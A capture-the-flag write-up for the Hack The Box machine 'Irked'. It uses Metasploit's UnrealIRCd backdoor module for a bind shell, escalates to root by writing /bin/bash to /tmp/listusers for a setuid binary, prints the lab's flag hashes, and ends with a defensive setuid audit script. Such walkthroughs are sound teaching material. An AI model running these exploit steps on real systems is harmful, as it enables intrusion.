Irked HTB Write-up

Machine IP - 10.10.10.117

Initial Phase

Starting with an nmap scan, we get the following result -

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 18:16 +04
Nmap scan report for 10.10.10.117
Host is up (0.25s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
6697/tcp  open  irc     UnrealIRCd
60500/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds

The IRC service is the interesting one. Version detection on port 6697 identifies it as UnrealIRCd. nmap does not print a version number, but UnrealIRCd is best known for the backdoor that was planted in its 3.2.8.1 source release (CVE-2010-2075): any line a client sends that starts with the string "AB" is handed straight to system(). Metasploit has a module for exactly that. First, confirm the service on its own -

root@kali:~/Desktop/Hack The Box/irked# nmap -sV -p 6697 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-17 22:31 +04
Nmap scan report for 10.10.10.117
Host is up (0.20s latency).

PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds

Moving forward

From here, we can use metasploit for the exploit as follows -

root@kali:~/Desktop/Hack The Box/irked# msfconsole -q
msf5 > search unreal ircd

Matching Modules
================

   Name                                        Disclosure Date  Rank       Check  Description
   ----                                        ---------------  ----       -----  -----------
   exploit/linux/games/ut2004_secure           2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Linux)
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution
   exploit/windows/games/ut2004_secure         2004-06-18       good       Yes    Unreal Tournament 2004 "secure" Overflow (Win32)

###### trying the excellent one

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   Name                                  Disclosure Date  Rank    Check  Description
   ----                                  ---------------  ----    -----  -----------
   cmd/unix/bind_perl                                     normal  No     Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                                normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                     normal  No     Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                                normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/generic                                       normal  No     Unix Command, Generic Command Execution
   cmd/unix/reverse                                       normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_bash_telnet_ssl                       normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   cmd/unix/reverse_perl                                  normal  No     Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                              normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_ruby                                  normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                              normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                     normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
    :irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Started bind TCP handler against 10.10.10.117:4444
[*] Command shell session 1 opened (10.10.12.66:41567 -> 10.10.10.117:4444) at 2019-03-17 22:03:24 +0400

id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
python -c 'import pty; pty.spawn("/bin/bash");'
ircd@irked:~/Unreal3.2$ whoami
ircd

This gives us a shell on the box from the backdoored IRC daemon, running as the unprivileged ircd user. Note that it is a bind shell, not a reverse shell: with cmd/unix/bind_perl the payload listens on port 4444 on the target and Metasploit connects to it. The python one-liner upgrades it to a proper pty. For privilege escalation, sudo -l is the usual first check, but sudo is not even installed here (bash reports "sudo: command not found"), so we look at setuid binaries with find instead. One caveat on the command used: -perm 4755 only matches files whose mode is exactly 4755; -perm -4000 would match any file carrying the setuid bit (4750, 6755, and so on) and is the safer enumeration. It happens to make no difference on this box -

ircd@irked:~/Unreal3.2$ sudo -l
bash: sudo: command not found
ircd@irked:~/Unreal3.2$ find / -perm 4755 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

viewuser is the odd one out: every other entry is a standard setuid binary that ships with Debian, while /usr/bin/viewuser is not part of any package. So we run it to see what it does -

ircd@irked:~/Unreal3.2$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-03-25 01:42 (:0)
sh: 1: /tmp/listusers: not found

The last line is an error from sh rather than from viewuser itself ("sh: 1:" is the error format of Debian's /bin/sh, dash), which tells us viewuser hands a command line to a shell, system()-style, and that command is the hard-coded path /tmp/listusers, which does not exist. Since viewuser is setuid root and /tmp is world-writable, we control what runs at that path: drop a script there that starts /bin/bash and it should be executed with root privileges. One thing to be aware of: bash resets its effective UID to the real UID on startup unless run with -p, so this only yields a root prompt if viewuser also sets the real UID to 0 before spawning the helper; the root prompt below shows that it does. The chmod 777 is more than needed (the file only has to be executable), but it does no harm here.

ircd@irked:~/Unreal3.2$ echo "/bin/bash" > /tmp/listusers
ircd@irked:~/Unreal3.2$ chmod 777 /tmp/listusers
ircd@irked:~/Unreal3.2$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2019-03-25 01:42 (:0)
root@irked:~/Unreal3.2# cd ..
root@irked:~# ls
Unreal3.2
root@irked:~# cd ..
root@irked:/home# ls
djmardov  ircd
root@irked:/home# cd djmardov
root@irked:/home/djmardov# ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
root@irked:/home/djmardov# cd Desktop
root@irked:/home/djmardov/Desktop# ls
root@irked:/home/djmardov/Desktop# cd ../..
root@irked:/home# cd /root
root@irked:/root# cat root.txt
8d8e9e8be64654b6dccc3bff4522daf3
root@irked:/root# cd /
root@irked:/# find / -name user.txt 2>/dev/null
/home/djmardov/Documents/user.txt
root@irked:/# cat /home/djmardov/Documents/user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

Thus, we get root and can read both the flags.
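The privilege escalation above is a general pattern, not something specific to viewuser: a setuid root binary that runs a helper from a directory anyone can write to. The script below is an added example for this write-up (not code from the page or from the target machine) that automates the two manual steps: enumerate files carrying the setuid bit, with the "-perm -4000" meaning rather than the exact-mode 4755 match used above, then pull the embedded absolute paths out of each one (what `strings viewuser | grep /` would show) and flag any that live in a world-writable directory such as /tmp. The baseline list is taken from the Debian binaries in the find output above; make_demo_tree builds a constructed sample tree in a temporary directory so the audit can be run offline.

```python
"""Audit setuid binaries for hard-coded paths in world-writable directories.

Added example for the Irked write-up; not the page's code. Generalises the
viewuser / /tmp/listusers finding: report every setuid file that embeds a
path whose parent directory is writable by everyone.
"""
import os
import re
import stat
import tempfile

# Setuid binaries that ship with Debian, taken from the write-up's find output.
DEBIAN_BASELINE = {
    "/usr/lib/eject/dmcrypt-get-device", "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper",
    "/usr/sbin/exim4", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/pkexec", "/usr/bin/passwd", "/usr/bin/chfn", "/sbin/mount.nfs",
    "/bin/su", "/bin/mount", "/bin/fusermount", "/bin/ntfs-3g", "/bin/umount",
}

# Absolute path literals as they appear in a binary's string table.
PATH_RE = re.compile(rb"/(?:[A-Za-z0-9_.-]+/)*[A-Za-z0-9_.-]+")


def find_setuid(root="/"):
    """Yield (path, stat) for every regular file under root with the setuid bit.

    Equivalent to `find root -type f -perm -4000`: any mode with the bit set
    qualifies, not only 4755.
    """
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; same as find's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st


def world_writable_dir(path):
    """True if the directory that would contain path is writable by everyone."""
    try:
        st = os.stat(os.path.dirname(path) or "/")
    except OSError:
        return False
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def referenced_paths(binary):
    """Sorted absolute path strings embedded in the binary."""
    with open(binary, "rb") as f:
        data = f.read()
    return sorted({m.group(0).decode() for m in PATH_RE.finditer(data)})


def audit(root="/", baseline=DEBIAN_BASELINE):
    """Map each suspicious setuid file to the risky paths it references.

    Known-good baseline binaries are skipped unless they reference a path in
    a world-writable directory; anything not in the baseline is reported even
    with an empty list, because an unexpected setuid file deserves a look.
    """
    findings = {}
    for path, _st in find_setuid(root):
        risky = [p for p in referenced_paths(path) if world_writable_dir(p)]
        if path in baseline and not risky:
            continue
        findings[path] = risky
    return findings


def make_demo_tree():
    """Build a constructed sample (not the real target) and return its root:
    a world-writable 'drop' directory plus a fake setuid helper whose bytes
    mention a path inside it, mirroring viewuser and /tmp/listusers."""
    root = tempfile.mkdtemp(prefix="suid-audit-")   # created 0700, not world-writable
    drop = os.path.join(root, "drop")
    os.mkdir(drop)
    os.chmod(drop, 0o1777)                            # like /tmp
    helper = os.path.join(root, "viewuser")
    with open(helper, "wb") as f:
        f.write(b"\x7fELF\x02\x01\x01 fake binary\x00"
                b"This application is being developed\x00"
                + os.path.join(drop, "listusers").encode() + b"\x00/etc/passwd\x00")
    os.chmod(helper, 0o4755)  # set the bit after writing; a write would clear it
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else make_demo_tree()
    for binary, risky in audit(target).items():
        print(binary, "->", ", ".join(risky) or "(no world-writable paths)")
```

Run it with no arguments to see the constructed sample flagged; run it with "/" on a target to audit the real filesystem. It does not prove a binary executes the path it mentions (that still takes strings, ltrace or a disassembler), but on Irked it narrows the list from eighteen setuid files to one line: /usr/bin/viewuser -> /tmp/listusers.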